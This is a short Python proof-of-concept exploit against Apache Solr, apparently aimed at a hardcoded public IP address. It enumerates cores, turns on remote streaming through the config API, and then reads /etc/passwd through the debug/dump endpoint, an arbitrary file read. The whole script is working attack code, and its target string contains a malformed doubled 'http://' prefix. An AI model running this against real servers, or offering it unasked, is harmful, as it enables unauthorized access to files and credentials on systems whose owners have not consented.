# -*- coding: utf-8 -*-
import requests

host = "http://http://114.215.189.57:8983"
if host[-1] == '/':
    host = host[:-1]


def poc(host):
    url = host + '/solr/admin/cores?indexInfo=false&wt=json'
    core_data = requests.get(url, timeout=3).json()
    if core_data['status']:
        core = list(core_data['status'].keys())[0]
        jsonp_data = {"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": 'true'}}
        requests.post(url=host + "/solr/%s/config" % core, json=jsonp_data)

        result_data = requests.post(url=host + '/solr/%s/debug/dump?param=ContentStreams' % core,
                                    data={"stream.url": "file:///etc/passwd"}).json()
        if result_data['streams']:
            print(result_data['streams'][0]['stream'])
    else:
        exit("不存在此漏洞")


poc(host)
